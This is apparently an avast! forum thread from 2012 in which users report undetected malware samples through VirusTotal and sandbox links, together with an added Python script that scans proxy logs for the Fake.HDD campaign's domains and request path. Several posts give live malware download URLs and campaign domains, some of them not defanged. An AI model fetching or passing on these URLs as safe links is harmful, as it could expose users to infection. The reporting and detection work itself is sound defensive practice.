Just hope they beef up the server as the load gets horrendous at times and this page took some time just to load, haven't tried submitting anything yet.
-
Hi DavidR,
Did they also fix the problem with loading newer VT result links?
polonus
-
I have no idea, as I said I haven't submitted anything so I didn't have a results link to test. But I honestly don't know what is going on with the links as I had never experienced the problem.
-
https://new.virustotal.com/file/9e243a83be426211ed22b9e41e3a0d9dbee713412429014a16291632a296e6d6/analysis/1325226582/
Malwarebytes' Anti-Malware - Java fake
-
Well the link works, which is a good first step on the new.vt, the server is still slow. Don't particularly like the new layout too big and expanded, too much white space.
The additional information at the bottom is nice; this one is a bit of a strange beast as it gives information on the "Sigcheck digital signature information" and this is saying it has a digital signature.
publisher................: Sun Microsystems, Inc.
product..................: Java(TM) Platform SE 6 U26
internal name............: javaw
copyright................: Copyright (c) 2011
original name............: javaw.exe
file version.............: 6.0.260.3
description..............: Java(TM) Platform SE binary
All the other info pulled from the file also indicates it is a Sun file; if it is a fake, they have gone to extraordinary lengths. But given its file size, it is very large, 888KB for javaw.exe (so suspect). I have an old copy of javaw.exe from jre6 update 27 and that is only 141KB, and that comes up clean on VT.
Since virtually all of the detections are generic/heuristic/crypt/packer, I would certainly send it to http://anubis.iseclab.org/?action=home for further detailed analysis.
-
Does anyone wonder why Burkoff has the avast! revolving icon in his signature: ???
http://images.backata.com/image-62A6_4D301DF5.gif
-
Does anyone wonder why Burkoff has the avast! revolving icon in his signature: ???
http://images.backata.com/image-62A6_4D301DF5.gif
That's not a VT link! ::)
Well the link works, which is a good first step on the new.vt, the server is still slow. Don't particularly like the new layout too big and expanded, too much white space.
+1
-
Hi folks,
And as yet not fully functional for searching on a URL for file scan results. Asked jotti in a mail to come up with a url scan link function as well, but the man there said as for now they cannot find the time to do it. Only alternative I have is Garyshood Online Virus Scanner with URL scan (hampered now because depending on VT results?). This scanner - http://urlscan.chanret.com/ seems only to have DrWeb URL scanner results implemented, and I advise against the use of it because avast Web shield may alert the search results it delivers, for instance JS:Redirector-MX[Trj] was found when scanning for results on scanning JS/Agent.aln ARIN AR ivitor at -towebs.com 200.62.54.127 to 200.62.54.127 -dentalflores.com.ar -http://dentalflores.com.ar (also blocked by Google Safebrowsing by the way - and WOT, see: http://www.webutation.net/go/review/dentalflores.com.ar )
polonus
-
Not detected by avast, TR/Spy.Gen, see: http://www.virustotal.com/url-scan/report.html?id=85e70e0b4afa97e773d99020e167cbf9-1325334179
and http://www.virustotal.com/file-scan/report.html?id=438f18f570c9365f407a588825812c457494b714e158a8f4f69946e79783a51e-1325337792
Also see:
http://camas.comodo.com/cgi-bin/submit?file=438f18f570c9365f407a588825812c457494b714e158a8f4f69946e79783a51e&iframe=
reported to virus AT avast dot com
polonus
-
Not detected: http://www.virustotal.com/url-scan/report.html?id=b80dc2cfd03eb0d9a04f093379690f87-1325607516
and
http://www.virustotal.com/file-scan/report.html?id=10975776bf2e7e52cddf98dac34aff6fd6959909f92dbbf508fe0c4ba4dc7683-1325611195
infected with TR/Dropper.Gen
reported to virus AT avast dot com
see also: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ULS/detailed-analysis.aspx
&
http://www.threatexpert.com/report.aspx?md5=b65bb482a940ab00705271151ee88d85
polonus
-
undetected malware:
https://new.virustotal.com/file/904d9840f39231f253cef9f57c374936a3b3ba4927f8da5bf0d39a8a17e40889/analysis/1325623059/
-
undetected malware:
https://new.virustotal.com/file/904d9840f39231f253cef9f57c374936a3b3ba4927f8da5bf0d39a8a17e40889/analysis/1325623059/
AVG had caught it! Respect!
But is that real threat?
-
Hi avastfan18,
It is a fake av ransom trojan, so a real threat. Did you forward this to virus AT avast dot com?
polonus
-
Hi avastfan18,
It is a fake av ransom trojan, so a real threat. Did you forward this to virus AT avast dot com?
polonus
Hopefully JuninhoSlo already did send it. ;)
-
Hi avastfan18,
It is a fake av ransom trojan, so a real threat. Did you forward this to virus AT avast dot com?
polonus
Hopefully JuninhoSlo already did send it. ;)
I sent UD malware -via:
-email
-chest
-http://www.avast.com/contacts
-
Hi JuninhoSlo,
Thanks for adding to avast detection,
pol
-
Hi JuninhoSlo,
Thanks for adding to avast detection,
pol
Any time ;)
-
unknown_file_$INSTDIR/Winup.exe not detected by avast:
http://vscan.urlvoid.com/analysis/c692522ec46913bc0b05febb718e6b2d/d2ludXBiZy13cDAxNi1leGU=/
see: http://www.virustotal.com/url-scan/report.html?id=e8a3bc64470f99c3bcc6600a17b52b72-1325773847
& http://www.virustotal.com/file-scan/report.html?id=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850-1325777542
& http://anubis.iseclab.org/?action=result&task_id=149d599224d926784c1d77666c679ec32
See: http://camas.comodo.com/cgi-bin/submit?file=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850
See: http://siteinspector.comodo.com/public/tasks/81175 with this last scan nothing found
reported to virus AT avast dot com
polonus
-
I get a new VT result via the MD5 hash: http://www.virustotal.com/file-scan/report.html?id=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850-1325794663
VT Community Opinions differ - 50% goodware 50% malware
&
http://camas.comodo.com/cgi-bin/submit?file=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850&iframe=
See: http://www.threatexpert.com/report.aspx?md5=43d3f031ab9e1bd78ce82c55ca564997
seen as low risk, could it be riskware or even a PUP?
pol
-
Trojan-Downloader.Win32.Karagany
http://www.virustotal.com/file-scan/report.html?id=ac1dc4d0c949f3d801f3220dc05d89e9cd0e261a3a1d24b2e999a70125aae1ad-1325849510
http://urlquery.net/report.php?id=14831
-
http://www.virustotal.com/file-scan/report.html?id=486924457c58d4c9a5d23e287fb3eff8efaaa098c55987c4bc39a0f04a3c6d70-1325869063
http://anubis.iseclab.org/?action=result&task_id=19d59e40e7a331b4465decf76ba5923f8&format=html
Fake.AV
Submitted.
-
See: https://new.virustotal.com/url/204247e99fbb5985046cce37b742b2433794c68cd9e4ff876a48887f8cab9391/analysis/1325883253/
and
http://vscan.urlvoid.com/analysis/7139ee9bad5b095c589c316ec27de84a/YWdlbmRhLWV4ZQ==/
See: https://new.virustotal.com/file/e4abc9d2a62fd7775738f6b36931ea14ab4b29bca2e6394f338f9508757deb63/analysis/
See: -http://jsunpack.jeek.org/?report=043e665c96f3f6945e7b09f61cc25f1649ee6b85
Visit above link only when security savvy, with ample script protection and in a VM,
reported to virus AT avast dot com,
polonus
-
Not detected by avast, TR/Spy.Banker.53248.13, should be detected as Win32:Malware-gen, see:
http://vscan.urlvoid.com/analysis/376702393caa1d8f6800b5bf7125765d/YXNzaXN0aXItYW9zLXZpZGVvcy1pZHMtMDAwMTIw/
See: https://new.virustotal.com/url/95ada4f72abcb65054e5241dec30309e07e8072ed3c9b9a0a8ff3c32b25320de/analysis/1325888647/
DrWeb URL checker flags: Checking: -http://198.106.204.222/view/videos/downloads/Assistir_AoS_Videos=iDs=00012012_.exe
Engine version: 7.0.0.11250
Total virus-finding records: 2511482
File size: 52.00 KB
File MD5: 376702393caa1d8f6800b5bf7125765d
-http://198.106.204.222/view/videos/downloads/Assistir_AoS_Videos=iDs=00012012_.exe infected with Trojan.DownLoader5.31000
and in this case avast does detect: http://www.virustotal.com/file-scan/report.html?id=142e69c070aa3d418a1f8fdcb121ec6aaf2c1b19572dcb7f7ba25bdbd45b5a0e-1325886727
as: Win32:Malware-gen
polonus
-
Re: https://new.virustotal.com/url/bf8f68458cdf3d1be3b1aad36f072033c4c6a1f94c5eb08ff7dcdc69b5a67ecf/analysis/1325976924/
and
http://www.virustotal.com/file-scan/report.html?id=c2c7eda4fc5f34f3e6e734d907e2eff642d78ebda1a75a904c5b31350557621e-1325970284
See: http://vscan.urlvoid.com/file/ec6a2d79b13d3dd8427cc0413dcdde4b/bWUyc3VwcG9ydGVyLWV4ZQ==/
It is Trojan-Banker.Win32.Banker
polonus
-
Trojan/Win32.Blocker not detected: http://www.virustotal.com/file-scan/report.html?id=c56bcc8b9cb97bb6df30f18dd4360e36614b2e058203547f6f3da00a427248eb-1326043721
polonus
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=37b8446d6f82c77fa9ff88417af08aa5faef69bf6c86138d2460d2ee7c95e5fb-1326307856
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=37b8446d6f82c77fa9ff88417af08aa5faef69bf6c86138d2460d2ee7c95e5fb-1326307856
http://www.isthisfilesafe.com/md5/66CBC40C85B9163CB9275367663D5E2F_details.aspx
Good find
-
trojan.zbot.
Trojan.Danmec
https://www.virustotal.com/file/f582e283d9da5d9d7031f93d7ce4f973f45f0b461e7118b23e2b5509d48f7fa8/analysis/
http://urlquery.net/report.php?id=15840
Uploaded
-
#W32/Yakes.
https://www.virustotal.com/file/b084faf441fc3c68f3a2cd6f4fb66dfe6e07084217a0a3176d37cc405c061253/analysis/1326389697/
Submitted
-
https://www.virustotal.com/file/bcbfc3882cb3d8b3e6188f3a46bfbb2e6f16c0e6c4cfbedcc8279a49d049b250/analysis/1326390293/
#Rogue.FakeRean
Submitted
-
Winlock
https://www.virustotal.com/file/a2d90463b7acce176af1933d8539e9e1f653d5ba8dcf8b71c0b5c5553dd30277/analysis/
https://www.virustotal.com/file/8c1c8c27093257f9d21d3dc57e798f04bfb9c3b5e198aa5343d505d17a595c3c/analysis/1326400820/
https://www.virustotal.com/file/829243518e7f1a51f79cfc2ea5cec218be3c136fd12696ef7daa7546f0a12ddd/analysis/1326400847/
https://www.virustotal.com/file/ca97030ba892535e784a1cbcfce5c0c2359f711bbca2ab9defcefbe2e08a91ee/analysis/1326400854/
https://www.virustotal.com/file/d96de5ab60bb93855840a00893ba8a42e47b676bd93da9984dbbf5e56dfc7d93/analysis/1326430284/
Submitted
-
Dim@rik,
It is a pity that the use of this tool was not mentioned: http://support.kaspersky.com/faq/?qid=208282275 in the case of this reported: https://www.virustotal.com/file/ca97030ba892535e784a1cbcfce5c0c2359f711bbca2ab9defcefbe2e08a91ee/analysis/ This special decryptor tool was designed for these trojans - scanner download at site there, link source Kaspersky Support...
polonus
-
Dim@rik,
It is a pity that the use of this tool was not mentioned: http://support.kaspersky.com/faq/?qid=208282275 in the case of this reported: https://www.virustotal.com/file/ca97030ba892535e784a1cbcfce5c0c2359f711bbca2ab9defcefbe2e08a91ee/analysis/ This special decryptor tool was designed for these trojans - scanner download at site there, link source Kaspersky Support...
polonus
Good day Polonus
No, not much so, that you have a link to the utility for deciphering virus cryptor.
A Winlock looks like this https://www.drweb.com/xperf/unlocker/gallery/
Just like Trojans and I sent.
-
Malware EXP/SWF.AS not found by avast - low detection anyway:
https://www.virustotal.com/url/4533dedc7b44843bc1a6bfa417e00e61c2a9ebb5db863f72937671579a2f606f/analysis/1326562266/
see: https://www.virustotal.com/file/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df/analysis/
see: http://vscan.urlvoid.com/analysis/689f5374450115b9a3f90024883732af/Mjc=/
Also see: https://www.virustotal.com/file/b191f7b5bde474869140f30165b6ae9879cb6af3073c0abc05650c585172fb28/analysis/
reported to virus AT avast dot com with all other instances at VW,
polonus
Goodware blackhole to discredit av detections: https://www.virustotal.com/file/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df/analysis/
-
undetected malware
https://www.virustotal.com/file/a641219006c0c8d76c3f0b610f11f15140eb7ce673b97d8ab97f6e53abb3e81b/analysis/1326651018/
https://www.virustotal.com/file/4ad877a8587e1baa288b5c89545d07d299f293b514f195e5088d9a8d6d1d4249/analysis/1326653818/
https://www.virustotal.com/file/eb7aa41abeabfaa9cdeb8758cba25678ef071e6dd96475facd26185002311424/analysis/1326654974/
-
Hi JuninhoSlo,
The first one was this: http://threatcenter.crdf.fr/?More&ID=64651&D=CRDF.Trojan.Win32.PEx.91916191925
Related to this: http://research.sunbelt-software.com/partnerresource/MD5.aspx?md5=387fb9d8f1969d118c3abcf4da46e9a2 or this: http://vms.drweb.com/virus/?i=1719341
polonus
-
Rogue.FakeRean
https://www.virustotal.com/file/11cb777880e1abfd1a9285fb98b598e6e7d5b5c25b11ef4610d3ea695e6dcba2/analysis/1326802024/
-
Not detected by avast: http://vscan.urlvoid.com/analysis/ab9403919144c1d4f9dd2d4378a452c8/ZnR1MTAwNC1leGU=/
reported to virus AT avast dot com,
polonus
P.S. Detected as PUP see: https://www.virustotal.com/file/d6474fe7b8ec47bf8152f197cb83f99c7af5f7a32548a73963ec145faefdb14f/analysis/
-
Submited.
Trojan.Karagany
https://www.virustotal.com/file/24c09d3920beee4b5c5e3b56a7a095c737bdaca3766ae2880c6cf12d4bb7aa70
-
submitted.
#rogue.Fake.HDD
https://www.virustotal.com/file/96f825b5810eb220ae7fb6e2a148261b009ab564f507ca57ede7db4562acc937/analysis/1327001583/
new Fake.HDD fast flux campaign.
livofotaltv.com
onelenolecubs.com
wautilber.com
withijs.com
RGX:
GET /britx/a HTTP1.1
-
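The Fake.HDD post above gives two kinds of indicator: a handful of fast-flux domains and a request pattern ("RGX: GET /britx/a"). Because fast-flux campaigns rotate domains faster than any blocklist is updated, the request pattern is usually the more durable thing to alert on. The script below is an added example for this thread, not code from the poster or from avast: it runs both indicators over a few proxy log lines. The log lines and their format ("date time client-ip method url HTTP/version status") are constructed for the example; only the four domains and the /britx/a path come from the post.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed proxy log lines for this example (not from the original post).
SAMPLE_LOG = """\
2012-01-19 14:02:11 10.0.0.5 GET http://livofotaltv.com/britx/a HTTP/1.1 200
2012-01-19 14:02:12 10.0.0.5 GET http://www.example.com/index.html HTTP/1.1 200
2012-01-19 14:03:40 10.0.0.9 GET http://www.wautilber.com/britx/a HTTP/1.1 404
2012-01-19 14:05:02 10.0.0.7 GET http://cdn.example.net/britx/a HTTP/1.1 200
2012-01-19 14:07:55 10.0.0.5 POST http://withijs.com/upload HTTP/1.1 200
"""

# Domains named in the post as part of the Fake.HDD fast-flux campaign.
FAKE_HDD_DOMAINS = frozenset({
    "livofotaltv.com", "onelenolecubs.com", "wautilber.com", "withijs.com",
})

# The post's "RGX: GET /britx/a HTTP1.1" as a real regular expression over
# "<method> <path>". This catches the campaign on hosts not yet on the list.
FAKE_HDD_REQUEST_RE = re.compile(r"^GET /britx/a$")

# Assumed (constructed) log format: "<date> <time> <client-ip> <method> <url> HTTP/<ver> <status>"
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<client>\S+) "
    r"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/\S+ (?P<status>\d{3})$"
)


def host_matches(host: str, domains: frozenset) -> bool:
    """True if host is one of the campaign domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_line(line: str) -> Optional[Dict[str, object]]:
    """Return a hit record when a log line matches a campaign indicator, else None."""
    m = LOG_LINE_RE.match(line.strip())
    if not m:
        return None  # malformed or unrelated line
    parts = urlsplit(m.group("url"))
    indicators: List[str] = []
    if parts.hostname and host_matches(parts.hostname, FAKE_HDD_DOMAINS):
        indicators.append("known-domain")
    if FAKE_HDD_REQUEST_RE.match(f"{m.group('method')} {parts.path}"):
        indicators.append("campaign-path")
    if not indicators:
        return None
    return {
        "ts": m.group("ts"),
        "client": m.group("client"),
        "host": parts.hostname,
        "indicators": indicators,
    }


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan a whole log and return every hit, in file order."""
    hits = []
    for line in text.splitlines():
        hit = classify_line(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

In the sample, the fourth line (cdn.example.net, a constructed host) is flagged only by the path pattern: that is the case a domain list alone misses, and the reason the poster's request pattern is worth keeping alongside the domains.
-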
Cidox
https://www.virustotal.com/file/41aaf73598c481bfc9633a6be45fce76aedc29e0063afb3a171ee8dd78940382/analysis/1327327826/
https://www.virustotal.com/file/6cc87cfe04023d7189b2c3f6a547bc81ba0ff7ed5ca7d7dd88686962f8d79c7e/analysis/1327328072/
https://www.virustotal.com/file/ae4c86f1ceb2228f2f11175a9901918ee7a2ba28cf56787b9724e4377bf95d88/analysis/1327328173/
Some samples sent on Saturday morning are still not defined by Avast.
Slow processing of samples.
-
https://www.virustotal.com/file/10548bcbd80a9a8144d76e8d34700b77de70216285bed1268b5be17f11b35e94/analysis/1327587770/
Sample Sent
-
Trojan winlock.V not detected by avast:
https://www.virustotal.com/file/b4b2ce263e475515e687f3f75bc33ce5537cc55a6e376d1dce08abb6f679f728/analysis/
polonus
-
Submitted
https://www.virustotal.com/file/63dddb0a63c8b451bf115907c50f5516bcc8d7ed070b12f870c0ad6de9f3d598/analysis/
-
Nothing detected here: http://vscan.urlvoid.com/analysis/78314d320bcecf33c5ab83bd678b1081/MzI=/
flagged as Trojan-Ransom.Win32.Foreign.xy by kaspersky's
Suspicious: http://urlquery.net/report.php?id=18597
See: http://anubis.iseclab.org/?action=result&task_id=137ec74bf307e2cf411f8a83b60ef88a5&format=html
VT results:
https://www.virustotal.com/file/04fc3e16bda3568cf5be72a031eda73fab5908ade5e1c7b627bded8480a04fce/analysis/
reported to virus at avast dot com,
polonus
-
https://www.virustotal.com/file/efbe07b84aa9e5fab4497ac9f639907d3eb7e97494392b62d94e177d345f1764/analysis/1328109225/
Submitted
-
https://www.virustotal.com/file/6b864aab9ac841074a6e9aeae39b2bdce95441369965fd9e3482443469ac5585/analysis/1328155272/
https://www.virustotal.com/file/2a4e71017ec0eea41a8b71e6f20ba821ca57c71b28529aca3170e2c0010afe9d/analysis/1328155287/
https://www.virustotal.com/file/33806dd561edd18b83668cd026c68d44324ab159b5d260d7205c23d5784a2588/analysis/1328155306/
https://www.virustotal.com/file/b4fa589bbd3ade90acb3e7f3ff61287d5aab749e0d78685e6e9f71a5716da23a/analysis/1328155319/
https://www.virustotal.com/file/5228e85720fbb7b1e66e0852faab2a879ddb55289d5b454f36603967778e4d03/analysis/1328155332/
https://www.virustotal.com/file/6d295b677c9092338b2e882d9c8831a00cda9e39fce0d81df78c4d16f061b33c/analysis/1328155341/
Submitted
-
https://www.virustotal.com/file/f98467ca503ea197e973516818ea256eb48f223a5babccba43237853dd4b0181/analysis/
Submitted
-
Not flagged: http://vscan.urlvoid.com/analysis/06c257e1bf122b61b5fdf5b2fd8ff69b/Y2xhc3NpY21lbnUtZXhjZWwtMjAxMC1leGU=/
see: http://anubis.iseclab.org/?action=result&task_id=1462de462286de304c14ae5a46796f884
and VT scan: https://www.virustotal.com/url/6676996ba4a9bd5c288515636801cfb3dea6fb88cb4261ca05cf9504a2d15d59/analysis/
Not detected here is ADWARE/Agent.1886490.2 or Trojan.Generic.6670956, also known as Backdoor.Win32.Agent.iba
polonus
-
https://www.virustotal.com/file/7e8bb57ad97ace3aa4a8f3ecaf5538e84b58a06e16569f3f60f190fa3e83f80b/analysis/1328464255/
https://www.virustotal.com/file/b0da44b15ab0097ced6af589437f5ec975cadcb5245a5be4d234aa68f2413f29/analysis/1328465733/
-
The second day there is no detection of threats :( Win32:LockScreen
https://www.virustotal.com/file/36b2a0c387fea7bace73154a2eb68daec0ca8f8d7ba863438b671fcdfdb5da61/analysis/1328557748/
https://www.virustotal.com/file/11d9efbf2d1c34959cee8989b8f3a922c1b5faec71d7f07fcd00c788b9a55fd8/analysis/1328557767/
https://www.virustotal.com/file/be7fc0c6b4358ae6c55fa64e6d617924dffb282259f8f354f06e7dd922995fcc/analysis/1328557780/
-
#Trojan.Karagany
https://www.virustotal.com/file/290853e5d2451bbcba738412efba7f3d50f5e9572a6fb23476e7ba8b966b15fa/analysis/1328630874/
Submitted
-
Non detected HTML/Agent.NP, see: hxtps://www.virustotal.com/file/a72d07ac7c8e6a07dc0f0f0c4cb8c24136da5acea1e5dc3e3c6aff9d095fb661/analysis/
see: hxtp://vscan.urlvoid.com/analysis/f382fe3d08efcce6cd54e56071cac771/Y256ejYtaHRtbA==/
reported to virus AT avast dot com,
polonus
-
Not detected, see: htxp://vscan.urlvoid.com/analysis/927ae0659a7cefd8435d9f7b680da729/aW5kZXg=/
reported to virus AT avast dot com,
polonus
-
https://anubis.iseclab.org/?action=result&task_id=1fa86a345dd2a5204cd5b2fe588b79bce&format=html
https://www.virustotal.com/file/f5cc4b10818133d64825d8aaacc3fd2996604a0bd6c33161d209062a156b162c/analysis/
#Fake.AV
Submitted
-
Not detected by avast flagged as BDS/IRCBot.adit.11, re: htxp://vscan.urlvoid.com/analysis/1cd3a366d926ecc90a5ef9a8de9f3be2/ZS1ncmVldGluZ3MtZXhl/
See: htxp://siteinspector.comodo.com/public/reports/316047
reported to virus AT avast dot com,
polonus
-
undetected malware
https://www.virustotal.com/file/495d315808242be519213cc5226e78d96152212c3c54f71f6aad4b7bf1d8da80/analysis/1329499841/
-
https://www.virustotal.com/file/a474534bf4185fc604b66396b69fb3a032c9f47b38bcf5ab4e9104d25cfe1054/analysis/
-
Hi Burkoff,
The threat you mention is as yet still unconfirmed: http://threatcenter.crdf.fr/?More&ID=73847&D=CRDF.Trojan.Trojan.Win32.Spy372115777
Another instance of this malware flagged : https://www.virustotal.com/file/a474534bf4185fc604b66396b69fb3a032c9f47b38bcf5ab4e9104d25cfe1054/analysis/
polonus
-
Not detected facebook trojan:
https://www.virustotal.com/file/0b93e830d387218e628b18509f8e7bd0552e231224e23695c8b1582e4507016d/analysis/1329642980/
Sent via virus chest.
-
FakeAV
https://www.virustotal.com/file/c426ee3d74fdbbc00a5eab8b22ed8a911d7a1337c0b925fa51dd6c7adce0c922/analysis/1329644318/
sent to avast!
-
CRDF.Trojan.Dropper.
https://www.virustotal.com/file/7d8342b53cc049baff60ad69aaa7c14e5a8aef601a1e497506399c10dc08d6c5/analysis/1329644421/
Not detected.
Sent to avast!
-
CRDF.Malware.Win32.PEx.Delphi
https://www.virustotal.com/file/06d28a88c7186156ea17612baf79a80f124e6e961de8e700cc988c7890bf4cca/analysis/1329644585/
Not detected sent to avast
-
https://www.virustotal.com/file/e268ce5b04325c3cc719b732edf2d5c3217023994a8a6c9908b3bba2251f90c6/analysis/1329644885/
Not detected.
Sent to avast!
-
Last sample from me today :)
https://www.virustotal.com/file/40e57c819409a025de6a4596e18b156521f31e19c50dc878f5479f724c4753d2/analysis/1329644939/
Not detected.
Sent to avast!
-
@true indian: Please summarise your findings in one post..!! Thanks.
-
@true indian: Please summarise your findings in one post..!! Thanks.
Sorry Asyn, I am currently not at home and I am doing this from another machine.
-
@true indian: Please summarise your findings in one post..!! Thanks.
Sorry Asyn, I am currently not at home and I am doing this from another machine.
Well, not sure why posting from another machine would make a difference..??
Anyway, please remember it for the next time. ;)
-
CaM.Malware.Win32.PEx.C.91167921839
https://www.virustotal.com/file/8d7abf40f309ae3c3dba5b6ce4c588a8ec4112f297e6a6369b8883e2ee2db4cb/analysis/1329645931/
Not detected... sent to avast!
TR/Offend
https://www.virustotal.com/file/3bd58f2bca88b72d3d8c158913eddaab4dc34f7203608108d38253a69dd10564/analysis/1329646147/
Not detected sent to avast!
-
FakeAV
https://www.virustotal.com/file/c426ee3d74fdbbc00a5eab8b22ed8a911d7a1337c0b925fa51dd6c7adce0c922/analysis/1329644318/
sent to avast!
First seen by VirusTotal 2010-01-05 05:03:03 UTC ( 2 year, 1 month ago )
Sigcheck
publisher................: Trend Micro
product..................: HouseCall
internal name............: HouseCall
copyright................: Copyright (c) 2009 Trend Micro
signing date.............: 11:00 AM 12/25/2009
original name............: HouseCall.exe
signers..................: Trend Micro, Inc.
VeriSign Class 3 Code Signing 2004 CA
Class 3 Public Primary Certification Authority
file version.............: 1.0
description..............: Trend Micro HouseCall updater and launcher
-
CRDF.Malware.Win32.PEx.Delphi
https://www.virustotal.com/file/06d28a88c7186156ea17612baf79a80f124e6e961de8e700cc988c7890bf4cca/analysis/1329644585/
Not detected sent to avast
hmmmm....what do you think ::)
First seen by VirusTotal 2007-09-11 11:18:56 UTC ( 4 year, 5 months ago )
-
Hi Pondus,
Lucky for true indian, the malware is still with us: https://www.virustotal.com/file/06d28a88c7186156ea17612baf79a80f124e6e961de8e700cc988c7890bf4cca/analysis/
Last given at MalcOde on 2012-02-18, actual status not given,
polonus
-
https://www.virustotal.com/file/af96e40a254c99038610bc5a0df5b47e708511aba23d09f5b0b1f0b6d9c7561e/analysis/1329935605/
-
Hi liosant,
What you gave is an undetected Zeus trojan detection, dated 2012/02/22_18:15 from stratoserver dot net.
See: htxp://vscan.urlvoid.com/file/1655be4bd82fb8db376336c604f945a0/bWQ1dnJibmktZXhl/ [none flagged it]
Did you send it to virus AT avast dot com?
polonus
-
This trojan backdoor is not detected by avast: https://www.virustotal.com/file/719702c00da3f540f2e7a43b0dcd031a7ca2b6bd79d06e90dbd5ff8b7426b6ff/analysis/
See: htxp://vscan.urlvoid.com/analysis/516025d2f8a55e5c93d138b75e594962/Y29weS1kdmQtbW92aWUtbm93LWV4ZQ==/
anubis analysis: htxp://anubis.iseclab.org/?action=result&task_id=18421afa1aaadf3149d3edafd7a43ad09
reported to virus AT avast dot com,
polonus
-
TR/Dldr.Delphi.Gen not detected by avast see: http://vscan.urlvoid.com/analysis/21a42bf899a01b32b23266a6eb3fac5a/Ym9sZXRvLWNsaWVudGUtaWQtMjU2OC16aXA=/
Sent to virus AT avast dot com,
polonus
-
Exploit.JS.Blacole not detected by avast
See: htxp://zulu.zscaler.com/submission/show/1e746713b9ddd676c658e51d7fba651f-1330733871
and htxp://vscan.urlvoid.com/analysis/e889828042cb5e1ba61b06ffcdc48bb7/aW50LW1hcmtldC1odG1s/
see: htxp://urlquery.net/queued.php?id=27509
Says: Detected Blackhole exploit kit v1.2 HTTP GET request
- Detected Live Blackhole exploit kit
reported to avast, via virus AT avast dot com,
polonus
-
See: htxp://zulu.zscaler.com/submission/show/8798b69cb50a0e2f38cc81234c6cffdf-1330878473
and hxtp://vscan.urlvoid.com/analysis/25c96c26895da3f701c2714a09d9fda7/Y2FzdGxlLWV4ZQ==/
hxtp://www.toppopgames.com/castle.exe/{app}\Update100.exe infected with Trojan.MulDrop.49139 aka TROJ_DROPPER.BS
polonus
-
https://www.virustotal.com/file/916e1957c18f845ff7b674624bed2b2942b9e2c42102bfd4524a78ad8ad60803/analysis/1331143828/
https://www.virustotal.com/file/4253307f888b997acc04aeb55b174a1b8d83c215087f3e9f5ade7da1f217baf5/analysis/1331143846/
https://www.virustotal.com/file/64d586cbe6bcddc12902e88d46451808f4141644fcbc438bf1b73e2be78f0fc1/analysis/1331144147/
For a long time they have not been added to the database.
Sent to avast!
-
Hi Dim@rik,
Thank you very much for adding to avast detection,
polonus
-
See: htxp://vscan.urlvoid.com/analysis/be551a9b2f4723e9b83b72135eb93153/aWRmb2xkZXJwcm90ZWN0b3JzZXR1cC1leGU=/
See: htxp://zulu.zscaler.com/submission/show/cf79a66f79c459dad2fff3da61d07b4a-1331213009
See: hxtps://www.virustotal.com/file/7985035c8fdc8df0a33b207d23239684aef662f252a5d38939cf17b9dc91aef4/analysis/
reported to virus AT avast dot com,
polonus
-
Trojan downloader not detected? See: htxp://zulu.zscaler.com/submission/show/d4d9d08f1f65746d58671660a7884484-1331540714
See: htxps://www.virustotal.com/file/f581cd8afd8720e57d3f72ad8e5c20929fb1355ea958aa054d6615c5788dffa8/analysis/
See:
htxps://www.virustotal.com/file/f581cd8afd8720e57d3f72ad8e5c20929fb1355ea958aa054d6615c5788dffa8/analysis/1331541685/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/5000f2f8eb553bde47a2fff77b9658c3d1fc187c10981ca6b842017f03e4eeb0/analysis/1331573829/
https://www.virustotal.com/file/22cc879095bbcb09731d5f7941d15b6b2e4995ad92ef742eeef941c7b79ec4cd/analysis/1331573841/
https://www.virustotal.com/file/bd8c7ee2a2d68ba233f41d4703356301bf0244cb0fd0b9494133d01a74c3de62/analysis/1331573852/
-
Not detected by avast, see: htxp://zulu.zscaler.com/submission/show/99a787d447fffe9623a635f45e8c8a8e-1331653986
and https://www.virustotal.com/file/9cd2c476b012a1b59176351d19e2a90910dd412011c4f2225567d572cbc9b319/analysis/
see: http://zulu.zscaler.com/submission/show/99a787d447fffe9623a635f45e8c8a8e-1331653986
htxp://qsbwq.info/Aktuelle-Rechnung.exe infected with Trojan.FakeAV.10767
reported to virus AT avast dot com,
polonus
-
Possible virus sent to avast!
https://www.virustotal.com/file/b0dc81eb634d259a26309ae0a13394a9baa3b51d68f480fe630bf15627beb7ff/analysis/
-
Not detected by avast yet: htxp://www.malware.com.br/cgi/search.pl?id=VHJvamFuLURvd25sb2FkZXIuV2luMzIuQXV0b0l0LnVk
See: htxps://www.virustotal.com/file/67778758c650ae8d806db50201c6dd2f55f5f9c5452b6759e48e4bea08c788dd/analysis/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/deb3b1435596eea7911462abc7320284e6690548ac065f27f38bab9b61c8ac37/analysis/1332432938/
not detected,
sample sent.
-
Not detected: htxp://zulu.zscaler.com/submission/show/97a41db3569e17f3e53f1813cc2dd6fe-1332525884 has TR/Crypt.XPACK.Gen
see: https://www.virustotal.com/file/9b1d23ccee1aa9804c2f4703715f1e5f718dd68abba6ccbf2fd75df184b40557/analysis/
reported to virus AT avast dot com,
polonus
-
Detected by Malwarebytes as Trojan.Zbot.AHGen
uploaded to superantispyware ;)
-
Not detected by avast HTML.Redirector, see: htxp://zulu.zscaler.com/submission/show/dfea7c633f3ebd6f32209496a6e3aa8a-1332623766
see: htxp://vscan.urlvoid.com/analysis/30621fc99bdf2160782295db247a26e3/aW5kZXg=/
